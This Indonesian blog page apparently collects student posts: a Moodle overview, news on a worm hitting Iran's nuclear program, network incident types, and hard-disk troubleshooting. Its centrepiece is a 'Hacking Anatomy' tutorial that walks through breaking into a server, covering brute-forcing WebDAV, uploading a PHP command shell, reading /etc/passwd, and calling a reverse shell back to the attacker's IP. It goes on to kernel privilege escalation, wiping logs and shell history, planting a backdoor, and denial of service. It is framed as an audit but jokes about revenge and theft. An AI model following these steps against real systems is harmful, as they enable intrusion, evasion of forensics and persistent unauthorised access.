Prototyping Tools

Prototyping Tools Content Management System.


Salah satu Prototyping Tools yang kami ambil adalah Moodle.
MOODLE (singkatan dari Modular Object-Oriented Dynamic Learning Environment) adalah paket perangkat lunak yang diproduksi untuk kegiatan belajar berbasis internet dan situs web yang menggunakan prinsip social constructionist pedagogy. MOODLE merupakan salah satu aplikasi dari konsep dan mekanisme belajar mengajar yang memanfaatkan teknologi informasi, yang dikenal dengan konsep pembelajaran elektronik atau e-learning. Moodle dapat digunakan secara bebas sebagai produk sumber terbuka (open source) di bawah lisensi GNU. Moodle dapat diinstal di komputer dan sistem operasi apapun yang bisa menjalankan PHP dan mendukung database SQL.

Di dunia e-learning Indonesia, Moodle lebih dikenal fungsinya sebagai Course Management System atau "Learning Management System" (LMS). Dengan tampilan seperti halaman web pada umumnya, Moodle memiliki fitur untuk menyajikan kursus (course), dimana pengajar bisa mengunggah materi ajar, soal dan tugas. Murid bisa masuk log ke Moodle kemudian memilih kursus yang disediakan atau di-enroll untuknya. Aktivitas murid di dalam Moodle ini akan terpantau progress dan nilainya. Di Indonesia sendiri, diketahui bahwa Moodle telah dimanfaatkan untuk sekolah menengah, perguruan tinggi dan perusahaan.

Nama MHS : Irsandy Julanda (061324089), Ahmad Ridwan (061323050), Renaldo Handoyo (061323043)
 Nama DSN : Feri Sulianta
Rekayasa Perangkat Lunak

Hacking Anatomy


Dalam melakukan hacking tentu ada langkah-langkah yang kita lakukan. Sebenarnya langkah-langkah itu adalah anatomi kita dalam melakukan hacking dan masing-masing memiliki tujuan tersendiri sehingga dengan tercapainya mini-goal tersebut, kita bisa maju ke langkah selanjutnya. Tetapi supaya tidak bosan baca teori anatomi hackingnya, di post ini juga akan diberikan contoh real hacking nya tentu saja yang sudah dibagi-bagi per stage anatominya.
Hacking Anatomy
Hacking Anatomy
Hacking Stage 0: Define the Target
Tentukan target yang akan kita serang. Target bisa didapat dari permintaan sang target sendiri untuk audit keamanannya, atau karena hanya iseng, ataupun karena dendam sama target hahah. Untuk contoh kali ini, target saya adalah sebuah server internal ber-IP private (192.168.66.87) yang ingin di audit keamanannya (jadi bukan karena dendam hehe).
Hacking Stage 1: Footprinting
Tahap selanjutnya adalah tahap dimana kita berusaha mencari informasi mengenai target sebanyak mungkin. Untuk contoh kali ini saya akan mencari informasi tentang si 192.168.66.87 sebanyak mungkin.. Berikut informasi yang bisa saya dapatkan:
OS Fingerprinting dengan nmap
OS Fingerprinting dengan nmap
Bisa coba juga dengan opsi “nmap -sV” untuk mengetahui versi dari masing-masing servis yang running di target tersebut. Setelah mengetahui versinya, bisa dimanfaatkan untuk dicari di forum-forum atau milis tentang bug/vulnerability dari versi service-nya. Misal Apache target adalah versi 2.0.52, tinggal cari security hole Apache/2.0.52. Yak, teorinya semudah itu. Banyak jalan menuju Roma, semoga beruntung ya hahah.
Lanjuutt… saya mendapat informasi bahwa webservernya adalah Apache versi 2.0.52. Dengan kesalahan konfigurasi dari ServerTokens webserver yang di-configure sangat spoiler sekali (Full) didapatkan informasi distro target adalah CentOS Linux lengkap dengan modul-modul yang aktif di webserver tersebut.
Mengais Informasi dari HTTP Response
Mengais Informasi dari HTTP Response
Jangan terlalu terpaku pada informasi yang saya dapatkan ya. Masih banyak informasi yang bisa didapatkan pada stage 1 ini. Diantaranya nih:
  1. Spesifikasi hardware target
  2. Siapa sysadmin nya
  3. Dimana lokasinya
  4. Topologi antara kita (penyerang) dan target, melewati berapa hop, ada di subnet mana, belakang firewall atau engga, dst
  5. dan lain sebagainya yang bisa dijadikan informasi seputar target… karena poin 1-4 di atas ini kadang bisa sangat berguna loh untuk kelanjutan stage hacking ke stage selanjutnya.
Hacking Stage 2: Scanning
Tahap berikutnya adalah melakukan scanning pada target untuk memetakan kelemahan dan kekuatan target. Dan tentu saja yang menyenangkan adalah bagian kelemahan target lah.. hehe. Sebenarnya nmap di atas juga bisa dikategorikan melakukan scanning, tapi scanning yang saya lakukan di atas masih tergolong ringan jadi lebih condong tergolong tahap perkenalan (footprinting). Seharusnya stage scanning ini sudah lebih intensif dari sekedar mencari informasi atau dengan kata lain sudah ada beberapa tindakan destruktif ringan yang terjadi pada target. Saya menggunakan software OpenVAS untuk men-scanning target sebagai berikut:
Vulnerability Report pada Target dengan OpenVAS
Vulnerability Report pada Target dengan OpenVAS
Dari hasil scan didapatkan informasi bagian mana saja yang vulnerable pada target. Dengan adanya tahap ini, diharapkan scope hacking semakin menyempit alias kita semakin fokus bagian target mana aja yang sebaiknya kita eksploitasi.
Hacking Stage 3: Enumeration
Tahap enumeration adalah tahap melakukan serangan. Pada tahap inilah ada babak gugur (hacker menyerah), exploitasi gagal, atau exploitasi berhasil hahah. Ini adalah tahap puter-puter otak bagaimana caranya kita bisa masuk ke sistem. Kadang bisa menghabiskan waktu berjam, hari, bulan, taun di tahap ini. Untuk percobaan hacking kali ini, kita coba ambil contoh vulnerability pada WebDAV (module mod_dav Apache) yang dilaporkan sama OpenVAS. Kita fokus dulu untuk hack WebDAV nya…
Biasanya WebDAV ada di direktori /webdav. Default config dan beberapa tutorial webdav juga biasanya mensugesti untuk install webdav di direktori /webdav. Apalagi kalau pada tahap 1 tadi kita dapat info kalau sysadmin target ternyata males ganti nama direktori dan sukanya nelen bulet-bulet tutorial orang di internet (tuh kan penting kenal sysadminnya juga heheh). Mari kita coba enumerasi webdav target..
HTTP Respon 401
HTTP Respon 401
Nah.. bener kan ada folder /webdav/… tapi ternyata untuk masuk folder /webdav/ dibutuhkan authentikasi dulu (terlihat dari respon server HTTP 401 Authorization Required), cuma authorized user yang boleh read dan write isi folder webdav. Sekarang coba masukin user password ngasal… Saya request HTTP HEAD untuk direktori /webdav/ dengan tipe Authorization “Basic” dan username password yang ngasal…
Respon Server Ketika HTTP Auth Salah
Respon Server Ketika HTTP Auth Salah
Terlihat masih sama responnya, HTTP 401 hehe. Username dan password diatas itu sudah dikonversi ke format base64 menjadi “YWRtaW5pc3RyYXRvcjphc2RmMTIz”. Kenapa base64? Hmm untuk mekanisme autentikasi HTTP menurut RFC-2617 adalah “username:password” di-encode menjadi format base64. Jadi untuk contoh ngasal ini “YWRtaW5pc3RyYXRvcjphc2RmMTIz” = “administrator:asdf123″. Untuk meng-encode dan decode banyak kok toolnya di internet. Salah satunya yang saya gunakan adalah ini.
Ayo jangan putus asa, kita coba pakai bantuan tools Hydra untuk membruteforce user dan password webdav ini. Akhirnya tidak lama ditemukanlah username dan passwordnya. Binggohh!! login: administrator dengan password: iloveyou hahahay..
Enumerasi WebDAV dengan Bruteforce
Enumerasi WebDAV dengan Bruteforce
Saya memanfaatkan user.lst dan password.lst John The Ripper buat si Hydra melakukan bruteforce. Makanya ada di direktori “john-1.7.7″ kalo diteliti konsol di atas ini hehe.. Terlihat juga di atas ternyata dilakukan 9507 percobaan login ke webdav.
Hacking Stage 4: Gaining Access
Tahap ini adalah tahap masuk ke dalam sistem. Ada dua kemungkinan akibat stage sebelumnya. Jika beribu enumerasi gagal sang hacker bisa langsung skip ke stage terakhir: Denial of Service dengan memenuhi service target dengan segelumit (halah) sebanyak-banyak request, sehingga server menjadi sibuk melayani request tersebut. Kalau terlalu sibuk bisa bikin service crash sampai yang paling parah si target bisa restart atau down. Tetapi kalau ternyata di stage sebelumnya salah satu enumerasi berhasil, silahkan bisa baca paragraf selanjutnya di bawah ini hehe.
Gaining access bisa dengan mencari credentials login atau misalnya menginjeksi shellcode pada program/service yang vulnerable sehingga target bisa mengeksekusi binary yang kita inginkan pada systemnya (biasanya sih, prefer kalo target mengeksekusi /bin/sh atau /bin/bash untuk kita sehingga kita bisa dapat shell).
Tetapi untuk contoh kali ini, berhubung di stage sebelumnya kita sudah mendapatkan credentials login (user dan password), mari kita masuk ke webdav menggunakan webdav client bernama Cadaver. Ternyata kita bisa ngapain aja di folder webdav ini. Horray! Hehe.
Break-in ke Direktori /webdav/
Break-in ke Direktori /webdav/
Hacking Stage 5: Escalating Privilege
Tahap ini adalah tahap untuk meningkatkan privilege jika ternyata kita hanya bisa menguasai target dengan privilege terbatas. Skip step ini jika kita sudah dapat root. Hahah.. beruntung sekali langsung dapet root hehe. Tapi untuk contoh kasus kita, di tahap sebelumnya kita sudah masuk ke folder webdav kan.. Nah, sekarang puter otak lagi bagaimana caranya agar saya bisa eskalasi privilege a.k.a menjadi root. Hmm.. Saya coba menggunakan file PHP yang bisa membantu saya mengeksekusi command-command di system target. Pertama-tama sih coba upload dulu file php pake perintah PUT tentu saja… dan ternyata bisa.. Heheh..
Mengupload File ke Folder WebDAV
Mengupload File ke Folder WebDAV
Setelah php_backdoor.php dan php_cmd.php di upload, buka browser kesayangan dan ketik URL http://192.168.66.87/webdav/php_cmd.php?cmd=<shell command biasa>. Berikut beberapa yang saya coba dan hasil outputnya:
URLOutput
http://192.168.66.87/webdav/php_cmd.php?cmd=cat%20/etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
...dst...
http://192.168.66.87/webdav/php_cmd.php?cmd=uname%20-r2.6.9-55.ELsmp
Hmm saya coba upload file pamungkas bernama “php-reverse-shell.php” yang saya dapat darihttp://pentestmonkey.net/tools/web-shells/php-reverse-shell untuk mendapatkan shell target memanfaatkan php. Modifikasi sedikit agar tujuan menuju IP saya dan portnya yang sudah menunggu heheh. Tinggal ketikkan ini di URL:
http://192.168.66.87/webdav/php-reverse-shell.php?ip=10.5.239.236&port=9999
Sementara netcat (nc) sudah stenbai listening di komputer saya dan spawn the target’s shell.. Horray!
Gaining Root Access
Gaining Root Access
Keterangan gambar di atas:
  • Sebelumnya saya sudah mengeksekusi netcat untuk stenbai listening di port 9999. Kemudian kita eksekusi URL http://192.168.66.87/webdav/php-reverse-shell.php?ip=10.5.239.236&port=9999 yang akan memberikan shell di netcat saya.
  • Saya mengetikkan perintah “id” untuk mengetahui jadi siapa saya di shell target ini
  • Saya mengetikkan “pwd” untuk mengetahui lokasi aktif di shell (ternyata di folder  /)
  • Browsing-browsing mencari dimana lokasi folder “webdav”. Awalnya sih karena intip-intip isi file httpd.conf/webdav.conf
  • Mengeksekusi exploit local escalation privilege karena ternyata kernelnya sudah jadul (2.6.9). “linux-sendpage3″ ini saya upload via Cadaver. Jadi sekarang tinggal eksekusi aja binary “run” nya
  • Who am I? I’m w00t!
Hacking Stage 6: Pilfering
Tahap ini adalah tahap yang tidak terlalu wajib dilakukan. Menurut kamus sih pilfering artinya pencurian haha… Ya kita bisa mencuri apa saja yang ada pada target. Misalnya dumping file username/password pada system (/etc/passwd dan /etc/shadow), masuk ke database mysql dan jalan-jalan liat table databasenya, atau curi-curi foto dan video. Sapa tau ada video skandal sysadminnya hahah.
Hacking Stage 7: Covering Tracks
Tahap selanjutnya adalah tahap yang biasanya malah lupa dilakukan orang yang berhasil break into target’s system. Padahal tim ahli forensik bisa menangkap kita karena track record ini. Bukti di pengadilan ya track record ini juga. Makanya kalau habis masuk rumah orang tanpa izin jangan lupa di pel tuh bekas lumpur di lantai dan sidik jari di gagang pintu hehe.
Ini contoh log terakhir yang ada di target.. IP kita keliatan toh.. Ooo hahahahah…
Access Log
Access Log
Silahkan berkreasi untuk membersihkan log nya. Contoh di atas ini adalah log HTTP request.. Mungkin bisa di edit untuk hapus line-line yang mencurigakan hehe. Ada lagi log session SSH kita juga tentu saja.. jangan lupa. Untuk membuat session SSH tidak tercatat, jangan lupa ketik command ‘unset HISTFILE’ dan ‘history -c’ setelah beraktifitas di shell target. Atau bisa dengan mengetikkan command ‘HISTFILE=/dev/null’ sebelum beraktifitas di shell target sedemikian sehingga variable HISTFILE akan selalu dicatat ke /dev/null (=buang) oleh shell target.
*clue* Di sistem target (karena sistemnya *nix), ada 3 log file penting, yang mencatat..:
  1. WTMP – setiap log in/off, waktu log in/off, tty, host
  2. UTMP – siapa yang online saat ini
  3. Lastlog – dari mana sumber log in terakhir
Lokasi file ini biasanya di /etc/ atau /var/adm/ atau /var/log dsb. Nah, silakan cari cara untuk cover track yang nanganin dan ngebersihin 3 file ini hehe
Hacking Stage 8: Creating Backdoors
Ada banyak cara membuat backdoor. Sesuai arti katanya, backdoor artinya pintu belakang atau jalan alternatif untuk kita masuk ke dalam sistem itu untuk kebutuhan kedepan hahah. Kalau bisa dibuat semudah mungkin untuk masuknya. Jangan serumit waktu pertama kali masuk ke target. Contoh backdoor bisa saja menginstall service yang listen pada port rahasia yang memprovide kita akses langsung ke shell target, membuat user baru, dan lain sebagainya.
Untuk contoh kita tadi, backdoor kita tentu saja file php-reverse-shell.php di URL rahasia kita:
http://192.168.66.87/webdav/php-reverse-shell.php?ip=10.5.239.236&port=9999
Jadi kedepannya kalau kita mau bertamu ke target lagi, tinggal siapin link di atas ini plus netcat di komputer kita yang set listen di port 9999. Tips: kalau bisa nama file backdoornya jangan php-reverse-shell.php… sangat mencurigakan.. hahahah.. sedikit kreatif untuk rename file dan sembunyiin di folder-folder tertentu haha.
Hacking Stage 9: Denial of Service
Denial of Service (DoS) adalah ancaman yang paling sering terjadi di dunia security. Siapa saja bisa melakukan dan ini bisa terjadi kapan saja, tidak harus karena ulah hacker, bahkan bisa terjadi karena ulah anak-anak alay yang gak ngerti komputer! Sesuai artinya, denial of service ya berarti si target menolak menjalankan service seperti biasanya. Katakanlah target kita adalah website registrasi e-KTP. Denial of service berarti adalah si server target e-KTP tidak bisa menjalankan service e-KTP untuk anda karena terlalu sibuk/down. Bayangkan betapa kecewanya kita dan betapa ruginya instansi e-KTP yang tidak bisa melayani (roda bisnis macet -halah).
Faktor-faktor yang menyebabkan denial of service ada banyak. Ada yang karena diserang ribuan rikues bertubi-tubi terus bikin si server sibuk, sampai yang emang karena si penyerang yang berhasil break-in (seperti kita di stage sebelumnya) sengaja ngetik command ‘/etc/init.d/httpd stop’. Ya kalau httpd stop sama aja dengan menolak layanan web dari client ‘kan??
Ini contoh Denial of Service akibat ulah anak-anak alay yang bahkan gak ngerti hacking sekalipun: (dari Wikipedia)
This describes a situation where a website ends up denied, not due to a deliberate attack by a single individual or group of individuals, but simply due to a sudden enormous spike in popularity. This can happen when an extremely popular website posts a prominent link to a second, less well-prepared site, for example, as part of a news story. The result is that a significant proportion of the primary site’s regular users — potentially hundreds of thousands of people — click that link in the space of a few hours, having the same effect on the target website as a DDoS attack. A VIPDoS is the same, but specifically when the link was posted by a celebrity.
An example of this occurred when Michael Jackson died in 2009. Websites such as Google and Twitter slowed down or even crashed.Many sites’ servers thought the requests were from a virus or spyware trying to cause a Denial of Service attack, warning users that their queries looked like “automated requests from a computer virus or spyware application”.
Untuk contoh melakukan serang DoS kali ini, saya akan serang service Apache target (192.168.66.87) sampai mabok karena request partial content yang bertubi-tubi..
DoS Attack
DoS Attack
Sambil mengeksekusi program tersebut saya coba menjalankan file test.html yang cuma berisi kata ‘hello world’ dan…. butuh waktu > 3 menit.. bayangkan betapa sibuknya si server. Ini masih bisa di rekayasa dengan membuat parallel reqs nya lebih besar lagi dan loop lebih banyak lagi.. bisa dijamin mabok Apachenya. Hehehe.
Penutup
Demikianlah stage hacking dan contoh nyata nya di setiap stage. Hasil akhir setiap stage akan berpengaruh ke stage selanjutnya. Sekian yang bisa saya sampaikan, semoga bermanfaat.

Computer Program Nuklir Iran diserang virus Worm

Berdasarkan informasi dari F-Secure yang mendapat email dari ilmuwan Iran yang bekerja di Organisasi Energi Atom Iran/Atomic Energy Organization of Iran (AEOI), program nuklir Iran telah diterobos oleh virus worm yang dengan eksploit yang dapat mematikan network automation Iran di Natanz dan pada fasilitas Fordo dekat Qom. Selain itu hardware jaringan automasi dan hardware Siemens juga ikut diserang dan dimatikan.



Menurut pakar cyber mereka, kemungkinan tool hacker bernama Metasploit lah yang digunakan di mana hacker mendapat akses ke VPN mereka.
Bahkan yang lucu, pada beberapa komputer di tempat mereka bisa memainkan musik sendiri pada tengah malam dengan volume suara paling maksimal dan memainkan lagu “Thunderstruck” dari AC/DC.
Memang perang antara Iran dan Israel sudah dimulai di dunia Cyber di mana virus Stuxnet sebelumnya telah menyerang program nuklir Iran dan juga sebaliknya Iran meluncurkan virus Mahdi untuk menyerang balik.

Sumber : http://www.beritateknologi.com/program-nuklir-iran-diserang-virus-worm-dan-memainkan-musik-thunderstruck-dari-acdc-di-tengah-malam/

Pengertian Insiden Keamanan Jaringan

Secara garis besar, Insiden keamanan jaringan dapat diklasifikasikan menjadi :
1. Probe
2. Scan
3. Account Compromize
4. Root Compromize
5. Packet Sniffer
6. Denial Of Service (DoS)
7. Exploitation Of Trust
8. Malicious Code

Penjelasannya adalah sebagai berikut :

• Probe : Usaha yang tak lazim untuk memperoleh akses ke dalam suatu sistem/ untuk menemukan informasi tentang sistem tersebut. Dapat dianalogikan sebagai usaha untuk memasuki sebuah ruangan dengan mencoba-coba apakah pintunya terkunci atau tidak
• Scan : kegiatan probe dalam jumlah besar dengan menggunakan tool secara otomatis. Tool tersebut secara otomatis dapat mengetahui port-port yang terbuka pada host lokal/host remote, IP address yang aktif bahkan bisa untuk mengetahui sistem operasi yang digunakan pada host yang dituju
• Account Compromise : penggunaan account sebuah komputer secara ilegal oleh seseorang yang bukan pemilik account tersebut. Account Compromise dapat mengakibatkan korban mengalami kehilangan atau kerusakan data.
• Root Compromise : mirip dengan account compromise, dengan perbedaan account yang digunakan secara ilegal adalah account yang mempunyai privelege sebagai administrator sistem. Akibat yang ditimbulkan bisa mengubah kinerja sistem, menjalankan program yang tidak sah
• Packet Sniffer : program yang dapat digunakan untuk menyadap data & informasi melalui jaringan komputer. Di tangan seorang admin, program sniffer sangat bermanfaat untuk mencari (debug) kesalahan jaringan/memantau adanya serangan. Mode promiscuous “mendengar” semua traffic yang sedang berjalan
• Denial of Service (Dos) : merupakan sebuah usaha (dalam bentuk serangan) untuk melumpuhkan sistem yang dijadikan target sehingga sistem tersebut tidak dapat menyediakan servis-servisnya atau tingkat servis menurun dengan drastis. Sistem yang diserang dapat menjadi “bengong” (hang, crash), turun kinerjanya (beban CPU tinggi)
• Eksploitasi Terhadap kepercayaan : pemerolehan akses komputer secara legal dengan memanfaatkan identitas yang samar
• Malicious Code : suatu program yang bila dieksekusi akan menyebabkan sesuatu yang tidak diinginkan di dalam user, yang termasuk malicious code : trojan horse, virus & worm.
Demikianlah pembahasan tentang Insiden Keamanan Jaringan dan penjelasannya.

Sumber : http://dhialsblog.blogspot.com/2011/09/insiden-keamanan-jaringan.html

PCE-10-07_Troubleshooting pada Hardisk

TROUBLESHOOTING PADA HARDDISK
Harddisk terformat.
Bila terjadi hal seperti ini, langkah yang paling tepat adalah lepas harddisk dari pc, lalu hubungkan harddisk tersebut ke computer lain (bisa menggunakan     kabel data USB 2.0 to IDE/SATA), kemudian gunakan software mengembalikan data
kita dapat mengembalikan data yang terformat dengan bantuan beberapa software utilities seperti “recuva” atau “test disk” yang bersifat free, ataupun partition magic recovery yang bersifat berbayar

      Data di harddisk terkena virus
Apabila data d harddisk terinfeksi virus dan telah menjalar ke system dan tidak memungkin kan kita untuk membackup data-data penting, mungkin beberapa software ini bisa membantu dalam menyelamatkan data-data yang penting di dalam hardisk hingga 80% tergantung pada tingkat infeksi virus pada data yang ada di hardisk. Software yang sering digunakan dan diakui ampuh oleh trouble shooter yaitu norton ghost , dan beberapa software free sebagai alternative seperti Test-Disk.
      Partisi pada harddisk hilang atau terhapus.
Pada keadaan ini computer masih bisa login ke windows (jika partisi yang hilang bukan partisi dimana MBR berada). Partisi tidak bisa tampil pada windows eksplorer. Coba dicheck dulu dengan cara klik kanan [MyComputer] > [Manage] > pada storage pilih [disk management]. Coba dilihat pada jendela sebelah kanan, terlihat apa tidak partisi yang hilang atau tidak muncul tadi. Setelah itu gunakan software untuk mengembalikan partisi yang hilang atau terhapus. menggunakan software Partition Find and Mount Pro untuk mengatasi masalah partisi hilang atau terhapus. Menggunakan nya yaitu setelah program dibuka pilih harddisk > scan > pilih salah satu dari pilihan yang tersedia > klik [scan]. Jika sudah ketemu partisi yang dicari (partisi yang hilang atau terhapus) klik [Mount As] ikuti perintah selajutnya. Buka kembali windows explorer, semoga partisi yang hilang sudah bertengger atau muncul kembali.

Harddisk tidak terdeteksi
Untuk melihat apakah harddisk terdeteksi atau tidak bisa dilakukan dengan cara : pada saat computer booting, masuk ke BIOS dengan menekan tombol delete atau F2 (tergantung merk motherboardnya), kemudian pilih pada standart CMOS setup. Maka akan tampil sejumlah harddisk maupun cdrom yang terpasang.
Harddisk tidak terdeteksi ini bisa disebabkan oleh karena kabel data maupun kabel power tidak tersambung dengan benar pada harddisk. [pasang kabel data IDE / SATA atau kabel power dengan benar pada harddisk]. Atau bisa juga disebabkan oleh pengaturan jumper yang tidak benar [atur kembali pengaturan jumper pada harddisk, tidak boleh sama dengan jumper cdrom atau harddisk yang lain bila terdapat lebih dari 1 harddisk]. Yang lebih parah lagi adalah dikarenakan harddisk memang sudah rusak parah sehingga tidak bisa digunakan lagi. Ada beberapa kemungkinan yang lain:
1. Secara Hardware
     -Kabel IDE-nya bermasalah. Coba pakai kabel yang benar-benar baik. Tes pada komputer lain.
     -Konektor IDE motherboard-nya bermasalah. Ada yang patah, longgar, atau bengkok.
     -Chip Southbridge motherboard-nya bermasalah. Ini biasa terjadi kalau sering dipakai dalam waktu yang lama (kepanasan/sistem    pendingin kurang baik)
 2. Secara software
     - Masalah pada BIOS.
 3. Secara teknis
      - Pemasangan kabel IDE pada motherboard longgar. Kadang hal ini dipicu oleh motor ODD yang berputar saat membaca CD.

Hardisk lambat mengakses file atau data.
Sering penggunaan hardisk dalam jangka waktu yang lama, terkadang kita merasakan kinerja harddisk yang mulai menurun, yang diakibatkan oleh beberapa faktor, berikut solusi untuk mempercepat kembali performa harddisk :
a. Buat ruang harddisk
Ini dapat anda lakukan dengan membuang file-file yang sudah tidak diperlukan (file sampah),.Dengan melakukan hal ini anda akan dapat meningkatkan kinerja komputer anda. Gunakan Disk CleanUp yang dapat anda akses dari Start | All Programs | Accessories | System Tools | Disk CleanUp, biarkan utility bawaan Windows ini melakukannya secara otomatis untuk anda, jangan kuatir file penting anda terhapus karena utility ini hanya akan meng-identifikasi file-file yang dapat dihapus dengan aman tanpa mengganggu file atau data-data penting anda. File-file yang akan dihapus oleh utility ini yaitu Temporary Internet Files (file jenis ini menempati ruang hard disk cukup besar sebab Internet Browser/ Internet Explorer atau Mozilla Firefox membuat cache pada setiap halaman yang dibuka dengan tujuan untuk mempercepat akses ke halaman ybs. Jika anda membuknya lagi kelak), Microsoft ActiveX, Empty Recycle Bin (mengosongkan keranjang sampah/ Recycle Bin), membuang Temporary Files, membuang program yang ter-install oleh Windows jika anda tidak memerlukannya (anda harus menentukan sendiri pilihan untuk meng-uninstall, karena Windows tidak melakukan hal ini secara otomatis).

b. Percepat akses file dengan mendefrag
Hard disk yang ter-fragmentasi (terpencar) akan membuat kinerja komputer menjadi lambat, karena untuk meng-akses file, komputer harus mencari-cari file tersebut di se-antero hard disk (bayangkan jika hard disk tersebut berkapasitas amat besar, mis. 1 Terabyte). Untuk itu gunakan juga utility bawaan Windows yaitu Disk Defragmenter yang dapat anda akses melalui Start | All Programs | Accessories | System Tools | Disk Defraggmenter. Tentukan drive mana yang akan di Defrag, apakah semua drive yang ada atau drive tertentu saja berdasarkan pilihan anda. Klik Analize, Windows akan meng-informasikan kepada anda perlu atau tidaknya melakukan Defrag pada hard disk.
Utility bawaan Windows ini akan merapikan kembali File-file dalam hard disk anda yang terpencar-pencar (ter-fragmentasi) tersebut, sehingga akses terhadap file anda akan menjadi lebih cepat, demikian juga pada proses baca dan tulis pada hard disk. Jalankan utility ini sedikitnya sebulan sekali, namun anda dapat mengatur sendiri skedul kapan anda harus melakukan defrag pada hard disk, misalnya lebih dari satu bulan sekali jika anda menghendaki.

c. Lindungi komputer anda dengan spyware
caranya, klik Stsrt | Run, ketik C:\Windows\prefetch. hapus semua file yang terdapat di folder tersebut dengan menekan tombol Ctrl+A kemudian tombol Del pada keyboard File-file ini selain memudahkan akses bagi Spyware, juga berukuran cukup besar. File-file dalam folder ini tidak ada gunanya bagi anda dan juga membuat komputer anda menjadi lambat, karenanya babat habis saja untuk menghemat ruang hard disk anda, jangan lupa untuk melakukan Reeboot atau Restart komputer setelah anda melakukan penghapusan. Lakukan penghapusan pada folder ini sesering mungkin.

Memperbaiki harddisk yang badsector.
Harddisk adalah media penyimpan yang sangat penting pada computer. Sayangnya umur pemakaian yang terbatas. Kerusakan pada harddisk dapat disebabkan beberapa hal.
Hal yang masih dapat dilakukan untuk memperbaiki harddisk yang terkena bad sector adalah hanya kondisi dimana harddisk masih berputar, keadaan controller harddisk masih bekerja. Tetapi keadaan ini masih dibagi lagi, bila ingin mengunakan harddisk yang terkena bad sector. Masalah penyebab bad sector adalah salah satu kerusakan yang sering terjadi. Kondisi kerusakan oleh bad sector dibedakan oleh 2 keadaan:
•    Kondisi dimana platter harddisk aus. Pada kondisi ini harddisk memang sudah tidak dapat digunakan. Semakin lama harddisk semakin rusak dan tidak berguna lagi untuk dipakai sebagai media storage.
•    Kondisi platter yang aus tetapi belum mencapai kondisi kritis. Kondisi ini dapat dikatakan cukup stabil untuk harddisk. Kemungkinan harddisk masih dapat diperbaiki karena platter masih mungkin dilow level.
Ada beberapa tips untuk mengatasi bad sector yaitu :
a.    Secara Langsung
Jika menggunakan Windows XP, jalankan MS-DOS Prompt. Ketikkan perintah “chkdsk /R” lalu tekan [Enter]. Perintah itu akan membuat Windows mencari posisi bad sector dan mengembalikan data atau informasi yang masih bisa dibaca.
Cara barusan adalah tindakan cepat yang bisa Anda lakukan apabila Anda mencurigai hard disk punya bad sector.
b.     Secara tidak Langsung
Anda bisa pakai peranti yang mampu menghilangkan logic bad sector dan memperbaikinya. Asal tahu saja, bad sector dibagi jadi dua: logic dan physic. Peranti itu membuat hard disk kembali bekerja dengan “menghapus” bad sector-nya.

Hard disk biasanya dipaketkan dengan suatu peranti lunak untuk fungsi manajemen sekaligus perbaikan. Misalnya, Maxtor dan Quantum punya MaxBlast, Samsung punya ClearHDD, Seagate punya Seagate Format, Western Digital punya Old DLG Diagnostic, dan Fujitsu punya FJ-IDE Drive Initializer Utility.
Anda tidak wajib pakai peranti lunak paketan. Anda bisa juga pakai peranti lain. Perbaikan hard disk yang dijelaskan pada artikel ini memakai SpinRite (www.grc.com). Peranti lunak buatan Gibson Research ini cukup baik buat mengatasi masalah bad sector pada hard disk. Versi terbaru peranti ini—versi 6,0.
SpinRite mendukung FAT, NTFS, Linux, Novell, drive dengan beberapa sistem operasi serta hard disk yang belum diformat. Cara menggunakannya mudah saja. Tinggal ikuti langkah-langkah ini.
1. Buat disket atau CD yang bisa boot. Buatnya di SpinRite. Klik [Create Boot Diskette], [Create ISO or Image File], atau [Install SpinRite on Drive]. Biar gampang, pilih bikin CD bootable. Asal tahu, SpinRite hanya berjalan dalam modus DOS.
2. Setelah file image sudah jadi, gunakan software pembakar CD, seperti Nero Burning ROM, untuk membuat CD. Restart komputer dan boot dengan CD yang barusan dibuat.
3. SpinRite punya 5 opsi atau level. Level yang kemungkinan besar Anda butuhkan adalah level 2 ataupun level 4. Tindakan di level 2 adalah pengembalian data, sedangkan level 4 adalah pemeliharaan drive dan analisis. Pilih saja tindakan yang ingin Anda lakukan.
4. Level apa pun yang Anda pilih, Anda akan diminta untuk memilih drive atau partisi yang ingin Anda periksa atau perbaiki. Setelah itu, lihat atau ubah opsi bagaimana SpinRite memeriksa hard disk Anda. Kalau sudah, lanjutkan dengan langkah selanjutnya, yakni menguji kinerja drive.
Proses pemeriksaan bisa berjalan beberapa jam, tergantung kapasitas dan kecepatan hard disk. Menurut informasi dari pembuatnya, kecepatan maksimal SpinRite adalah 120 GB per jam.
Kalau SpinRite mendeteksi perlunya perbaikan, SpinRite akan langsung bekerja di Level 4 untuk memperbaiki dan mengembalikan data. Level 4 kembali memakan waktu yang tidak sebentar. Hitungan waktu pengerjaan bisa dalam satuan jam bahkan hari, lagi-lagi tergantung kerusakan.
SpinRite punya screen saver yang aktif ketika SpinRite sedang bekerja. Anda bisa pula menampilkan jalannya proses yang sedang berlangsung. Jika hard disk Anda mendukung fitur pembacaan suhu, SpinRite akan melaporkan informasi suhu hard disk. Temperatur hard disk akan naik terus saat SpinRite memperbaiki data Anda.
Ketika bekerja, SpinRite juga memiliki opsi untuk melihat lebih dekat proses perbaikan yang berlangsung.

PCE-10-07_Teknologi pada Hardisk

Untuk menyimpan data baik dalam jangka waktu pendek maupun dalam waktu jangka panjang dibutuhkan suatu media untuk melakukannya.dalam hal ini dibutuhkan suatu media yang disebut dengan media penyimpanan atau storage.Harddisk merupakan salah satu media penyimpanan sekunder  dalam komputerdan bersifat non volatail.fungsi utama harddisk adalah media penyimpanan atau storage data secara permanen.
Dari tahun ke tahun teknologi pada harddisk selalu mengalami perkembangan seiring dengan semakin berkembangnya ilmu pengetahuan dan teknologi.
Fokus pengembangan teknologi pada harddisk  yaitu pada aspek:
     1.   Kecepatan akses.
     2. Kapasitas(kerapatan data yang semakin tinggi). Merupakan ukuran       teknologi bahan yang digunakan seberapa besar bit data yang mampu disimpan dalam satu satuan persegi. Kapasitas harddisk pada saat ini sudah mencapai orde ratusan GB. Hal ini dikarenakan teknologi bahan yang semakin baik, kerapatan data yang semakin tinggi. Teknologi dari Western Digital saat ini telah mampu membuat harddisk 200GB dengan kecepatan 7200RPM. Sedangkan Maxtor dengan Maxtor MaxLine II-nya yaitu harddisk berukuran 300GB dengan kecepatan 5400RPM.
 3.  Bahan pembuat harddisk.
